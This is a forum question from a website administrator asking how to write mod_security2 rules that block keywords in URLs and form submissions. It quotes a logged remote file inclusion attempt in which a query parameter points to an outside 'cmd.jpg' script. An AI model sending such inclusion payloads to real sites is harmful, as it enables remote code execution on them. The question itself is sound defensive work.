HOW: Create my own mod_security2 rules?

I checked my mod_security2 log file and see a lot of entries similar to this:

GET /myfolder1/main.php?id=http://submitstation.de/xxxxxx/cmd.jpg

How do I set up a mod_security2 rule so that the hacker is stopped when:

1) He points his browser to my URL and the URL contain a specific word. In the above case, I would ban "submitstation.de".

2) He submits a form from my site and the content contains a specific word.

 

SecRule "REQUEST_URI|QUERY_STRING" "aaa|bbb"

I added the rule above to mod_security2. It successfully forbid the access if the URL contains aaa or bbb. But it does not prevent aaa and bbb from a submission form.

 

I believe the answer is in this simple manual http://www.modsecurity.org/documentation/ModSecurity2_Rule_Language.pdf but I don't think I understand this deep language.